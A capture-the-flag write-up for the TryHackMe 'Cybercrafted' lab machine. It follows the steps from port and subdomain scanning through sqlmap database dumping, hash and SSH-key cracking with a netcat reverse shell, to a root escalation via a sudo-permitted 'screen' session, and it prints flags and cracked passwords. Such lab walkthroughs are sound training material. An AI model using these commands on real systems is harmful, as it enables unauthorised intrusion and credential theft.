Cybercrafted

Reconnaissance

Looks like we will have to hack a minecraft server this time. Navigating to the IP, looks like DNS fails, that's because we get redirected to cybercrafted.thm, so add that to your /etc/hosts file.

Following CTF description, we will start with a NMAP scan to answer first question.

NMAP output

Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23 17:33 CET
Warning: 10.10.49.224 giving up on port because retransmission cap hit (2).
Nmap scan report for cybercrafted.thm (10.10.49.224)
Host is up (0.043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
|   256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_  256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp    open  http      Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Cybercrafted
|_http-server-header: Apache/2.4.29 (Ubuntu)
25565/tcp open  minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r  ck00r, Users: 0/1)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   48.64 ms 10.8.0.1
2   48.92 ms cybercrafted.thm (10.10.49.224)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 398.60 seconds

So now we can answer first 2 questions

How many ports are open? Answer: 3
What service runs on the highest port? Answer: minecraft

Next questions asks for subdomain, so let's fire FFUF to scan them

ffuf -w Subdomain.txt -u http://cybercrafted.thm -H "Host: FUZZ.cybercrafted.thm" -fc 302


        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : http://cybercrafted.thm
 :: Wordlist         : FUZZ: Subdomain.txt
 :: Header           : Host: FUZZ.cybercrafted.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 302
________________________________________________

admin                   [Status: 200, Size: 937, Words: 218, Lines: 31]
www                     [Status: 200, Size: 832, Words: 236, Lines: 35]
admin                   [Status: 200, Size: 937, Words: 218, Lines: 31]
store                   [Status: 403, Size: 287, Words: 20, Lines: 10]
www                     [Status: 200, Size: 832, Words: 236, Lines: 35]

So now we have the answer to the next question.

Any subdomains? (Alphabetical order). Answer: admin store www

Scanning

Now we need to add admin and store subdomains to our /etc/hosts file, and we can move onto finding a vulnerability.

After looking at a lot of directories and generally testing both subdomains, I found a SQL Injection vulnerability on search function in the store subdomain.

sqlmap -u http://admin.cybercrafted.thm/search.php --method POST --data "search=veqwveqwe&submit=" --dbs

[18:08:02] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapp

So now we can actually fetch the tables knowing the databases. The only one that's non standard for mysql is webapp, so let's look up that one.

sqlmap -u http://store.cybercrafted.thm/search.php --method POST --data "search=veqwveqwe&submit=" --dump -T admin -D webapp

Database: webapp
Table: admin
[2 entries]
+----+------------------------------------------+---------------------+
| id | hash                                     | user                |
+----+------------------------------------------+---------------------+
| 1  | 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01 | xXUltimateCreeperXx |
| 4  | THM{bbe315906038c3a62d9b195001f75008}    | web_flag            |
+----+------------------------------------------+---------------------+

Exploiting

So we got a flag, and what looks like credentials for the admin subdomain

Cracking the hash at this website, we find the password is diamond123456789, so let's use it on the admin subdomain.

Looks like it worked, and it allows us to execute system code, so everything that's left is to open a netcat listener and run our reverse shell payload.

Getting a reverse shell

max@1337 ~> nc -lvp 1337
Connection from 10.10.49.224:38948
/bin/sh: 0: can't access tty; job control turned off
$ ls
assets
dbConn.php
index.php
login.php
panel.php
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cybercrafted:/var/www/admin$ export TERM=xterm; export SHELL=/bin/bash
www/admin$ export TERM=xterm; export SHELL=/bin/bash
www-data@cybercrafted:/var/www/admin$ ^Zfish: Job 1, 'nc -lvp 1337' has stopped
max@1337 ~> stty raw -echo;fg
Send job 1, “nc -lvp 1337” to foreground


www-data@cybercrafted:/var/www/admin$

Perfect, going to "xxultimatecreeperxx" user's home directory we can find an encrypted ssh private key.

id_rsa

Now we just need to crack it with john the ripper and connect with it.

Cracking the private key

max@1337 ~> python3 ssh2john.py id_rsa > hash.txt
max@1337 ~> john --wordlist=rockyou.txt hash.txt
--------------------------------------------------------------------------
The library attempted to open the following supporting CUDA libraries,
but each of them failed.  CUDA-aware support is disabled.
libcuda.so.1: cannot open shared object file: No such file or directory
libcuda.dylib: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.so.1: cannot open shared object file: No such file or directory
/usr/lib64/libcuda.dylib: cannot open shared object file: No such file or directory
If you are not interested in CUDA-aware support, then run with
--mca opal_warn_on_missing_libcuda 0 to suppress this message.  If you are interested
in CUDA-aware support, then try setting LD_LIBRARY_PATH to the location
of libcuda.so.1 to get passed this issue.
--------------------------------------------------------------------------
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
creepin2006      (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2021-12-23 18:27) 0.3703g/s 5311Kp/s 5311Kc/s 5311KC/s *7¡Vamos!
Session completed
max@1337 ~ [SIGINT]> ssh xxultimatecreeperxx@cybercrafted.thm -i id_rsa
Enter passphrase for key 'id_rsa':
xxultimatecreeperxx@cybercrafted:~$

Perfect, we are in as a normal user now, so go grab the flag at /opt/minecraft and let's get to root.

Privilege Escalation

From looking at home directory, it looks like we are gonna need to do some lateral movement before root.

After exploring the filesystem, there's simply a log.txt file with the the 'cybercrafted' user's password in /opt/minecraft/cybercrafted/plugins/LoginSystem , so just grab that and switch to the user.

First thing I do when logged in as most privileged user is look for binaries with root or SUID permissions, so let's find out.

sudo -l

[sudo] password for cybercrafted:
Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted

Looking at GTFOBins, looks like this binary really shouldn't have SUDO permissions, as it doesn't drop privileges and we can create a new shell windows with root privileges. So, finally,

Abusing excessive binary permisions

CTRL + A + C
# ls
banned-ips.txt      bukkit.yml    craftbukkit-1.7.2-server.jar  logs     permissions.yml  server-icon.png    white-list.txt  world_nether
banned-players.txt  commands.yml  help.yml                      ops.txt  plugins          server.properties  world           world_the_end
# id
uid=0(root) gid=1002(cybercrafted) groups=1002(cybercrafted)
# cd /root
# ls
root.txt
# cat root.txt
THM{8bb1eda065ceefb5795a245568350a70}

On this page

Reconnaissance Scanning Exploiting Privilege Escalation